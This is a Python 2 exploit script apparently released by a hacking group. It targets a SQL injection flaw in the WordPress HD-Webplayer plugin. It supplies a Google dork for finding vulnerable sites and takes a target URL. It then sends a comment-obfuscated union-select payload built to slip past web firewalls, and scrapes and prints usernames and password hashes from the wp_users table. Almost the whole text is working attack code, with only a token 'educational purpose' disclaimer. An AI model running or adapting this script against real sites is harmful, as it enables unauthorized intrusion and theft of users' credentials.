Wordpress HD-Player SQLI Script by Witch3r

#!/usr/bin/env python
# Exploit Name: Wordpress HD-Webplayer SQL Injection Vulnerability
# Script by CyberTeamRox  - www.cyberteamrox.org
# We are El Mujahidin Team
# Vulnerability Discovered by: Someone (idk)
# Exploit Coded by Witch3r
# Dork: inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid=
# Tested and Working 100%.I suggest you to manually inject Website having WAF.My script is not good in WAF Bypass
# Credits : ZeSn,UxAiR,Baddass Elsa,Junior HAxor,Code Ninja
# Disclaimer: Only for Educational Purpose.Witch3r won;t be responsible for any misuse done by this script.
# Requirement: You need to install BS4 Module to python from https://pypi.python.org/pypi/beautifulsoup4/4.3.2 and extract it in python27>LIB>Site-Package
import sys
import time
import urllib
import urllib2
import webbrowser
from bs4 import BeautifulSoup
from urllib import urlopen
from urllib2 import Request, urlopen, HTTPError, URLError
import re
# Errors management
import sys
# Args management
import optparse
print ""
# Banner
print ""
print ""
print "      ======================================================================="
print "                  [+] Wordpress  HD-webplayer SQL Injector [+]              "
print "      ======================================================================="
print ""
print "                              Coded by: Witch3r"
print ""
print "                            ~~ El Mujahidin Team~~"
print ""
print "         Dork: inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid="
print ""
print "   Credits:CyberTeamRox,Uzair,Baddass Elsa,sofyan,Junior Haxor,code ninja,ZeSn"
print ""
print "     ========================================================================="
print ""
print ""
print ""
time.sleep(1)
# Input Target
dork = raw_input(" Search google dork? (y/n) :")
if dork=="y":
     webbrowser.open('https://www.google.com/#q=inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid=')
print ""
time.sleep(1)
link = raw_input(" Website(http://www.example.com) : ")
time.sleep(1)
# Web browser clients
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'
headers = { 'User-Agent':user_agent }
req = Request(link, headers = headers)
try:
        page_open = urlopen(req)
except HTTPError, e:
        print e.code
except URLError, e:
        print "Check url"
	exit()
else:
        print ""
        time.sleep(1)
        print 'Starting...'
print ''
time.sleep(1)
print '  Injecting  ' + link
# Vulnerable Path
inj = "/wp-content/plugins/hd-webplayer/playlist.php?videoid=null"
# Vulnerable url
print ""
vurl = link + inj
query ="%20/*!50000union*/%20/*!50000select*/%201,2,3,/*!50000GrOup_CoNcAt(0x757365726e616d65203a20,user_login,0x0a,0x50617373776f7264202857502d4841534829203a,user_pass)*/,5,6,7,8,9,10,11%20/*!50000from*/%20wp_users--"
result = vurl + query
# Web clients
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'
headers = { 'User-Agent':user_agent }
req = Request(result, headers = headers)
try:
        page_open = urlopen(req)
except HTTPError, e:
        print "   Not Vulnerable"
	exit()
except URLError, e:
        print "   Not Vulnerable"
	exit()
else:
        print ""
        time.sleep(1)
        print '   Vulnerable'
print ''
# User Credentials from sql query
time.sleep(1)
print " Username and password will be shown along with vulnerable columns "
url = result
html = urllib.urlopen(url).read()
soup = BeautifulSoup(html)
# kill all script and style elements
for script in soup(["script", "style"]):
    script.extract()
text = soup.get_text()
lines = (line.strip() for line in text.splitlines())
chunks = (phrase.strip() for line in lines for phrase in line.split("  "))
text = '\n'.join(chunk for chunk in chunks if chunk)
print(text.encode('utf-8'))
#The End ;)